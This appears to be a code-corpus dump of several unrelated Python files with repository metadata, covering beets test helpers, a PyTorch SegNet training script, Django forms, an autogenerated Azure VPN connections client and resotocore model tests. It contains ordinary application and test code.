log.setLevel(logging.DEBUG)
# Dummy item creation.
_item_ident = 0
# OS feature test.
HAVE_SYMLINK = sys.platform != 'win32'
def item(lib=None):
global _item_ident
_item_ident += 1
i = beets.library.Item(
title=u'the title',
artist=u'the artist',
albumartist=u'the album artist',
album=u'the album',
genre=u'the genre',
composer=u'the composer',
grouping=u'the grouping',
year=1,
month=2,
day=3,
track=4,
tracktotal=5,
disc=6,
disctotal=7,
lyrics=u'the lyrics',
comments=u'the comments',
bpm=8,
comp=True,
path='somepath{0}'.format(_item_ident),
length=60.0,
bitrate=128000,
format='FLAC',
mb_trackid='someID-1',
mb_albumid='someID-2',
mb_artistid='someID-3',
mb_albumartistid='someID-4',
album_id=None,
)
if lib:
lib.add(i)
return i
_album_ident = 0
def album(lib=None):
global _item_ident
_item_ident += 1
i = beets.library.Album(
artpath=None,
albumartist=u'some album artist',
albumartist_sort=u'some sort album artist',
albumartist_credit=u'some album artist credit',
album=u'the album',
genre=u'the genre',
year=2014,
month=2,
day=5,
tracktotal=0,
disctotal=1,
comp=False,
mb_albumid='someID-1',
mb_albumartistid='someID-1'
)
if lib:
lib.add(i)
return i
# Dummy import session.
def import_session(lib=None, loghandler=None, paths=[], query=[], cli=False):
cls = commands.TerminalImportSession if cli else importer.ImportSession
return cls(lib, loghandler, paths, query)
class Assertions(object):
"""A mixin with additional unit test assertions."""
def assertExists(self, path): # noqa
self.assertTrue(os.path.exists(util.syspath(path)),
u'file does not exist: {!r}'.format(path))
def assertNotExists(self, path): # noqa
self.assertFalse(os.path.exists(util.syspath(path)),
u'file exists: {!r}'.format((path)))
def assert_equal_path(self, a, b):
"""Check that two paths are equal."""
self.assertEqual(util.normpath(a), util.normpath(b),
u'paths are not equal: {!r} and {!r}'.format(a, b))
# A test harness for all beets tests.
# Provides temporary, isolated configuration.
class TestCase(unittest.TestCase, Assertions):
"""A unittest.TestCase subclass that saves and restores beets'
global configuration. This allows tests to make temporary
modifications that will then be automatically removed when the test
completes. Also provides some additional assertion methods, a
temporary directory, and a DummyIO.
"""
def setUp(self):
# A "clean" source list including only the defaults.
beets.config.sources = []
beets.config.read(user=False, defaults=True)
# Direct paths to a temporary directory. Tests can also use this
# temporary directory.
self.temp_dir = util.bytestring_path(tempfile.mkdtemp())
beets.config['statefile'] = \
util.py3_path(os.path.join(self.temp_dir, b'state.pickle'))
beets.config['library'] = \
util.py3_path(os.path.join(self.temp_dir, b'library.db'))
beets.config['directory'] = \
util.py3_path(os.path.join(self.temp_dir, b'libdir'))
# Set $HOME, which is used by confit's `config_dir()` to create
# directories.
self._old_home = os.environ.get('HOME')
os.environ['HOME'] = util.py3_path(self.temp_dir)
# Initialize, but don't install, a DummyIO.
self.io = DummyIO()
def tearDown(self):
if os.path.isdir(self.temp_dir):
shutil.rmtree(self.temp_dir)
if self._old_home is None:
del os.environ['HOME']
else:
os.environ['HOME'] = self._old_home
self.io.restore()
beets.config.clear()
beets.config._materialized = False
class LibTestCase(TestCase):
"""A test case that includes an in-memory library object (`lib`) and
an item added to the library (`i`).
"""
def setUp(self):
super(LibTestCase, self).setUp()
self.lib = beets.library.Library(':memory:')
self.i = item(self.lib)
def tearDown(self):
self.lib._connection().close()
super(LibTestCase, self).tearDown()
# Mock timing.
class Timecop(object):
"""Mocks the timing system (namely time() and sleep()) for testing.
Inspired by the Ruby timecop library.
"""
def __init__(self):
self.now = time.time()
def time(self):
return self.now
def sleep(self, amount):
self.now += amount
def install(self):
self.orig = {
'time': time.time,
'sleep': time.sleep,
}
time.time = self.time
time.sleep = self.sleep
def restore(self):
time.time = self.orig['time']
time.sleep = self.orig['sleep']
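# Illustrative usage sketch (not part of the original helpers): with Timecop
# installed, time.sleep() returns immediately and only the mocked clock moves.
def _timecop_usage_example():
    cop = Timecop()
    cop.install()
    before = time.time()
    time.sleep(60)                      # no real waiting happens here
    assert time.time() - before == 60   # the mocked clock advanced by 60s
    cop.restore()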
# Mock I/O.
class InputException(Exception):
def __init__(self, output=None):
self.output = output
def __str__(self):
msg = "Attempt to read with no input provided."
if self.output is not None:
msg += " Output: {!r}".format(self.output)
return msg
class DummyOut(object):
encoding = 'utf-8'
def __init__(self):
self.buf = []
def write(self, s):
self.buf.append(s)
def get(self):
if six.PY2:
return b''.join(self.buf)
else:
return ''.join(self.buf)
def flush(self):
self.clear()
def clear(self):
self.buf = []
class DummyIn(object):
encoding = 'utf-8'
def __init__(self, out=None):
self.buf = []
self.reads = 0
self.out = out
def add(self, s):
if six.PY2:
self.buf.append(s + b'\n')
else:
self.buf.append(s + '\n')
def readline(self):
if not self.buf:
if self.out:
raise InputException(self.out.get())
else:
raise InputException()
self.reads += 1
return self.buf.pop(0)
class DummyIO(object):
"""Mocks input and output streams for testing UI code."""
def __init__(self):
self.stdout = DummyOut()
self.stdin = DummyIn(self.stdout)
def addinput(self, s):
self.stdin.add(s)
def getoutput(self):
res = self.stdout.get()
self.stdout.clear()
return res
def readcount(self):
return self.stdin.reads
def install(self):
sys.stdin = self.stdin
sys.stdout = self.stdout
def restore(self):
sys.stdin = sys.__stdin__
sys.stdout = sys.__stdout__
# Utility.
def touch(path):
open(path, 'a').close()
class Bag(object):
"""An object that exposes a set of fields given as keyword
arguments. Any field not found in the dictionary appears to be None.
Used for mocking Album objects and the like.
"""
def __init__(self, **fields):
self.fields = fields
def __getattr__(self, key):
return self.fields.get(key)
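# Illustrative sketch (not part of the original module): fields passed to Bag
# become attributes, and anything else reads as None, e.g.
#   info = Bag(album=u'the album', artist=u'the artist')
#   assert info.album == u'the album'
#   assert info.year is None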
# Platform mocking.
@contextmanager
def platform_windows():
import ntpath
old_path = os.path
try:
os.path = ntpath
yield
finally:
os.path = old_path
@contextmanager
def platform_posix():
import posixpath
old_path = os.path
try:
os.path = posixpath
yield
finally:
os.path = old_path
@contextmanager
def system_mock(name):
import platform
old_system = platform.system
platform.system = lambda: name
try:
yield
finally:
platform.system = old_system
def slow_test(unused=None):
def _id(obj):
return obj
if 'SKIP_SLOW_TESTS' in os.environ:
return unittest.skip(u'test is slow')
return _id
| 25.880637 | 77 | 0.617095 |
7ffefce93f6cbce99a01464901f32df78ef85c94 | 618 | py | Python | tests/test_xbert_preprocessing.py | simonlevine/x-transformer-icd | 17d0a84f8b8e1f69623a82c0afab26830c7a1eb8 | [
"BSD-3-Clause"
] | 1 | 2020-12-15T00:55:25.000Z | 2020-12-15T00:55:25.000Z | tests/test_xbert_preprocessing.py | simonlevine/x-transformer-icd | 17d0a84f8b8e1f69623a82c0afab26830c7a1eb8 | [
"BSD-3-Clause"
] | null | null | null | tests/test_xbert_preprocessing.py | simonlevine/x-transformer-icd | 17d0a84f8b8e1f69623a82c0afab26830c7a1eb8 | [
"BSD-3-Clause"
] | null | null | null | import pytest
from pipeline import xbert_preprocessing as xp
@pytest.mark.unit
@pytest.mark.parametrize("label_raw,label_expected", [
("Tuberculous peritonitis",
"Tuberculous peritonitis"),
("Tuberculosis of eye, unspecified",
"Tuberculosis of eye unspecified"),
("Tuberculosis of (inner) (middle) ear",
"Tuberculosis of (inner) (middle) ear"),
("Chronic myeloid leukemia, BCR/ABL-positive, in relapse",
"Chronic myeloid leukemia BCR ABL-positive in relapse")
])
def test_xbert_clean_label(label_raw, label_expected):
assert xp.xbert_clean_label(label_raw) == label_expected | 38.625 | 62 | 0.73301 |
f30b141a1a5e5b344bee1f2ffcc16c56ea54a698 | 505 | py | Python | teams/forms.py | ZendaInnocent/django_saas | dc977f2eb26f4d82134b3f354989591265eef9ba | [
"MIT"
] | 4 | 2020-10-13T09:34:58.000Z | 2022-02-11T11:31:19.000Z | teams/forms.py | ZendaInnocent/django_saas | dc977f2eb26f4d82134b3f354989591265eef9ba | [
"MIT"
] | 24 | 2020-10-15T10:41:31.000Z | 2021-09-22T19:37:11.000Z | teams/forms.py | ZendaInnocent/django_saas | dc977f2eb26f4d82134b3f354989591265eef9ba | [
"MIT"
] | 5 | 2020-10-12T16:41:10.000Z | 2022-02-02T14:56:15.000Z | from django import forms
from django.contrib.auth import get_user_model
from accounts.forms import SignUpForm
User = get_user_model()
class CreateTeamForm(SignUpForm):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['password1'].widget = forms.HiddenInput()
self.fields['password2'].widget = forms.HiddenInput()
class UpdateTeamForm(forms.ModelForm):
class Meta:
model = User
fields = ['name', 'email', 'phone', ]
| 22.954545 | 61 | 0.679208 |
8061d5a4acfb1ca2ea97095893e8c65de383dc0a | 25 | py | Python | package/subpack/bar.py | alexanderzimmerman/python-package | d4c67fc0dea8e902b997eca4a1d5aac736162d82 | [
"MIT"
] | 1 | 2018-11-27T11:02:43.000Z | 2018-11-27T11:02:43.000Z | package/subpack/bar.py | alexanderzimmerman/python-package | d4c67fc0dea8e902b997eca4a1d5aac736162d82 | [
"MIT"
] | null | null | null | package/subpack/bar.py | alexanderzimmerman/python-package | d4c67fc0dea8e902b997eca4a1d5aac736162d82 | [
"MIT"
] | null | null | null | print("Hello, I'm Bar!")
| 12.5 | 24 | 0.6 |
01b260091211df2efba53b190a074d75885bda73 | 7,048 | py | Python | train.py | smbadiwe/Autoencoder | 54986e9d3b94d24c87ff4269d98dbf458ca16998 | [
"Apache-2.0"
] | null | null | null | train.py | smbadiwe/Autoencoder | 54986e9d3b94d24c87ff4269d98dbf458ca16998 | [
"Apache-2.0"
] | null | null | null | train.py | smbadiwe/Autoencoder | 54986e9d3b94d24c87ff4269d98dbf458ca16998 | [
"Apache-2.0"
] | null | null | null | import time
import torch.optim as optim
from torch import nn
from torch.utils.data import DataLoader
from data_gen import VaeDataset
from models import SegNet
from utils import *
EPS = 1e-12
def mse_loss(y_pred, y_true):
return (y_pred - y_true).pow(2).mean()
def rmse_loss(y_pred, y_true):
return torch.sqrt((y_pred - y_true).pow(2).mean())
def dis_loss(y_pred, y_true):
"""
Itakura-Saito distance, using mean instead of sum
:param y_pred:
:param y_true:
:return:
"""
# set log(0) and x/0 to 0.
mask = torch.ones(y_pred.size(), dtype=torch.float32, device=device)
mask[y_pred == 0] = 0.0
mask[y_true == 0] = 0.0
k_i = y_pred / (y_true + EPS)
result = (mask * (k_i - torch.log(k_i + EPS) - 1)).mean()
return result
def i_div_loss(y_pred, y_true):
"""
I-divergence, using mean instead of sum
:param y_pred:
:param y_true:
:return:
"""
# set log(0) and x/0 to 0.
mask = torch.ones(y_pred.size(), dtype=torch.float32, device=device)
mask[y_pred == 0] = 0.0
k_i = y_pred / (y_true + EPS)
return (y_true * mask * (k_i - torch.log(k_i + EPS) - 1)).mean()
losses_dict = {
"mse": mse_loss,
"rmse": rmse_loss,
"idiv": i_div_loss,
"dis": dis_loss
}
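# Illustrative sketch (not part of the original script): how one of the losses
# above can be looked up by name and applied to a prediction/target pair. It
# relies on the same star-imported `torch`/`device` names the module already
# uses; the tensor shapes below are arbitrary assumptions.
def _example_loss_usage():
    y_pred = torch.rand(2, 3, 64, 64, device=device)
    y_true = torch.rand(2, 3, 64, 64, device=device)
    loss_fn = losses_dict["idiv"]    # any of: "mse", "rmse", "idiv", "dis"
    return loss_fn(y_pred, y_true)   # scalar tensor, usable with .backward()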
def train(epoch, train_loader, model, optimizer, loss_fn):
# Ensure dropout layers are in train mode
model.train()
# Loss function
# criterion = nn.KLDivLoss.MSELoss().to(device)
batch_time = ExpoAverageMeter() # forward prop. + back prop. time
losses = ExpoAverageMeter() # loss (per word decoded)
start = time.time()
n_train = len(train_loader)
loss_function = losses_dict[loss_fn]
# Batches
for i_batch, (x, y) in enumerate(train_loader):
# Set device options
x = x.to(device)
y = y.to(device)
# print('x.size(): ' + str(x.size())) # [32, 3, 224, 224]
# print('y.size(): ' + str(y.size())) # [32, 3, 224, 224]
# Zero gradients
optimizer.zero_grad()
y_hat = model(x)
# print('y_hat.size(): ' + str(y_hat.size())) # [32, 3, 224, 224]
loss = loss_function(y_hat, y)
loss.backward()
# def closure():
# optimizer.zero_grad()
# y_hat = model(x)
# loss = torch.sqrt((y_hat - y).pow(2).mean())
# loss.backward()
# losses.update(loss.item())
# return loss
# optimizer.step(closure)
optimizer.step()
# Keep track of metrics
# losses.update(loss.item())
losses.update(loss)
batch_time.update(time.time() - start)
start = time.time()
# Print status
if i_batch % print_freq == 0:
print('Epoch: [{epoch}][{i_batch}/{0}]\t'
'Batch Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'{loss_fn} Loss {loss.val:.4f} ({loss.avg:.4f})\t'.format(n_train, epoch=epoch,
i_batch=i_batch, loss_fn=loss_fn,
batch_time=batch_time, loss=losses))
def valid(val_loader, model, loss_fn):
model.eval() # eval mode (no dropout or batchnorm)
# Loss function
# criterion = nn.MSELoss().to(device)
batch_time = ExpoAverageMeter() # forward prop. + back prop. time
losses = ExpoAverageMeter() # loss (per word decoded)
start = time.time()
loss_function = losses_dict[loss_fn]
with torch.no_grad():
# Batches
for i_batch, (x, y) in enumerate(val_loader):
# Set device options
x = x.to(device)
y = y.to(device)
y_hat = model(x)
loss = loss_function(y_hat, y)
# Keep track of metrics
losses.update(loss.item())
batch_time.update(time.time() - start)
start = time.time()
# Print status
if i_batch % print_freq == 0:
print('Validation: [{0}/{1}]\t'
'Batch Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'{2} Loss {loss.val:.4f} ({loss.avg:.4f})\t'.format(i_batch, len(val_loader), loss_fn,
batch_time=batch_time, loss=losses))
return losses.avg
def main(loss_fn, shrink=0):
start = get_last_saved_checkpoint_number(loss_fn=loss_fn, shrink=shrink)
if start >= epochs:
print(f"{loss_fn} | {shrink} - The last epoch [{epochs}] has already been completed")
return None
train_loader = DataLoader(dataset=VaeDataset('train'), batch_size=batch_size, shuffle=True,
pin_memory=True, drop_last=True)
val_loader = DataLoader(dataset=VaeDataset('valid'), batch_size=batch_size, shuffle=False,
pin_memory=True, drop_last=True)
# Create SegNet model
label_nbr = 3
model = SegNet(n_classes=label_nbr, shrink=shrink)
n_gpus = torch.cuda.device_count()
if n_gpus == 0:
print(f"{loss_fn} | {shrink} - !!! - Program is not using GPU. It'll run a lot slower")
if n_gpus > 1:
print(f"{loss_fn} | {shrink} - Let's use {n_gpus} GPUs!")
# dim = 0 [40, xxx] -> [10, ...], [10, ...], [10, ...], [10, ...] on 4 GPUs
model = nn.DataParallel(model)
# Use appropriate device
model = model.to(device)
# print(model)
# define the optimizer
# optimizer = optim.LBFGS(model.parameters(), lr=0.8)
optimizer = optim.Adam(model.parameters(), lr=lr)
best_loss = 9.e15
epochs_since_improvement = 0
print(f"{loss_fn} | {shrink} - Resuming from Epoch {start}")
# Epochs
for epoch in range(start, epochs):
# Decay learning rate if there is no improvement for 8 consecutive epochs, and terminate training after 20
# if epochs_since_improvement == 20:
# break
if epochs_since_improvement > 0 and epochs_since_improvement % 8 == 0:
adjust_learning_rate(optimizer, 0.8)
# One epoch's training
train(epoch=epoch, train_loader=train_loader, model=model, optimizer=optimizer, loss_fn=loss_fn)
# One epoch's validation
val_loss = valid(val_loader=val_loader, model=model, loss_fn=loss_fn)
print(f'\nSHRINK-{shrink} * {loss_fn} - LOSS - {val_loss:.3f}\n')
# Check if there was an improvement
is_best = val_loss < best_loss
if not is_best:
epochs_since_improvement += 1
print(f"\nSHRINK-{shrink} - Epochs since last improvement: {epochs_since_improvement}\n")
else:
epochs_since_improvement = 0
best_loss = val_loss
# Save checkpoint
save_checkpoint(epoch, model, optimizer, loss_fn, val_loss=val_loss, is_best=is_best, shrink=shrink)
if __name__ == '__main__':
sh, lf = get_shrink_value_and_loss_from_input()
main(loss_fn=lf, shrink=sh)
| 32.62963 | 114 | 0.579313 |
6940b37f066aece2ab75c252fa358446c8fe0a43 | 17,484 | py | Python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_04_01/operations/_vpn_connections_operations.py | iscai-msft/azure-sdk-for-python | 83715b95c41e519d5be7f1180195e2fba136fc0f | [
"MIT"
] | 1 | 2021-06-02T08:01:35.000Z | 2021-06-02T08:01:35.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_04_01/operations/_vpn_connections_operations.py | iscai-msft/azure-sdk-for-python | 83715b95c41e519d5be7f1180195e2fba136fc0f | [
"MIT"
] | 226 | 2019-07-24T07:57:21.000Z | 2019-10-15T01:07:24.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_04_01/operations/_vpn_connections_operations.py | iscai-msft/azure-sdk-for-python | 83715b95c41e519d5be7f1180195e2fba136fc0f | [
"MIT"
] | 1 | 2019-06-17T22:18:23.000Z | 2019-06-17T22:18:23.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class VpnConnectionsOperations(object):
"""VpnConnectionsOperations operations.
    You should not instantiate this class directly; instead, create a Client instance that will create it for you and attach it as an attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client API version. Constant value: "2018-04-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2018-04-01"
self.config = config
def get(
self, resource_group_name, gateway_name, connection_name, custom_headers=None, raw=False, **operation_config):
"""Retrieves the details of a vpn connection.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:param connection_name: The name of the vpn connection.
:type connection_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: VpnConnection or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.network.v2018_04_01.models.VpnConnection or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<azure.mgmt.network.v2018_04_01.models.ErrorException>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'connectionName': self._serialize.url("connection_name", connection_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VpnConnection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/vpnConnections/{connectionName}'}
def _create_or_update_initial(
self, resource_group_name, gateway_name, connection_name, vpn_connection_parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'connectionName': self._serialize.url("connection_name", connection_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(vpn_connection_parameters, 'VpnConnection')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 201]:
raise models.ErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VpnConnection', response)
if response.status_code == 201:
deserialized = self._deserialize('VpnConnection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, gateway_name, connection_name, vpn_connection_parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Creates a vpn connection to a scalable vpn gateway if it doesn't exist
else updates the existing connection.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:param connection_name: The name of the connection.
:type connection_name: str
:param vpn_connection_parameters: Parameters supplied to create or
Update a VPN Connection.
:type vpn_connection_parameters:
~azure.mgmt.network.v2018_04_01.models.VpnConnection
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns VpnConnection or
ClientRawResponse<VpnConnection> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2018_04_01.models.VpnConnection]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2018_04_01.models.VpnConnection]]
:raises:
:class:`ErrorException<azure.mgmt.network.v2018_04_01.models.ErrorException>`
"""
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
connection_name=connection_name,
vpn_connection_parameters=vpn_connection_parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('VpnConnection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/vpnConnections/{connectionName}'}
def _delete_initial(
self, resource_group_name, gateway_name, connection_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'connectionName': self._serialize.url("connection_name", connection_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, resource_group_name, gateway_name, connection_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes a vpn connection.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:param connection_name: The name of the connection.
:type connection_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises:
:class:`ErrorException<azure.mgmt.network.v2018_04_01.models.ErrorException>`
"""
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
connection_name=connection_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/vpnConnections/{connectionName}'}
def list_by_vpn_gateway(
self, resource_group_name, gateway_name, custom_headers=None, raw=False, **operation_config):
"""Retrieves all vpn connections for a particular virtual wan vpn gateway.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of VpnConnection
:rtype:
~azure.mgmt.network.v2018_04_01.models.VpnConnectionPaged[~azure.mgmt.network.v2018_04_01.models.VpnConnection]
:raises:
:class:`ErrorException<azure.mgmt.network.v2018_04_01.models.ErrorException>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_by_vpn_gateway.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.VpnConnectionPaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_by_vpn_gateway.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/vpnConnections'}
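    # Illustrative usage sketch (client setup assumed; not part of the generated code):
    # these operations are normally reached through the management client rather than
    # by instantiating this class directly, e.g.
    #
    #   client = NetworkManagementClient(credentials, subscription_id)
    #   poller = client.vpn_connections.create_or_update(
    #       resource_group_name, gateway_name, connection_name, vpn_connection_parameters)
    #   vpn_connection = poller.result()  # blocks until the long-running operation completes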
| 47.770492 | 195 | 0.67822 |
01323c9f4e0ae37129caf5ce3ccefeae1da5a6b1 | 22,566 | py | Python | resotocore/tests/resotocore/model/model_test.py | someengineering/resoto | ee17313f5376e9797ed305e7fdb62d40139a6608 | [
"Apache-2.0"
] | 126 | 2022-01-13T18:22:03.000Z | 2022-03-31T11:03:14.000Z | resotocore/tests/resotocore/model/model_test.py | someengineering/resoto | ee17313f5376e9797ed305e7fdb62d40139a6608 | [
"Apache-2.0"
] | 110 | 2022-01-13T22:27:55.000Z | 2022-03-30T22:26:50.000Z | resotocore/tests/resotocore/model/model_test.py | someengineering/resoto | ee17313f5376e9797ed305e7fdb62d40139a6608 | [
"Apache-2.0"
] | 8 | 2022-01-15T10:28:16.000Z | 2022-03-30T16:38:21.000Z | import json
from datetime import datetime, timedelta
from textwrap import dedent
from typing import Type, Any, Union, cast, List
import pytest
import yaml
from deepdiff import DeepDiff
from hypothesis import HealthCheck, settings, given
from networkx import DiGraph
from resotocore.cli.model import CLIContext
from resotocore.console_renderer import ConsoleRenderer, ConsoleColorSystem
from resotocore.model.model import (
StringKind,
Kind,
NumberKind,
BooleanKind,
DateKind,
DateTimeKind,
ArrayKind,
Property,
ComplexKind,
Model,
DictionaryKind,
predefined_kinds,
PropertyPath,
TransformKind,
DurationKind,
SyntheticProperty,
)
from resotocore.model.typed_model import to_json, from_js
from resotocore.types import Json
from resotocore.util import from_utc, utc, utc_str
from tests.resotocore.hypothesis_extension import json_object_gen
def test_json_marshalling() -> None:
roundtrip(StringKind("string"), Kind)
roundtrip(StringKind("string", 5, 13, "foo.*bla"), Kind)
roundtrip(StringKind("string", enum={"foo", "bla"}), Kind)
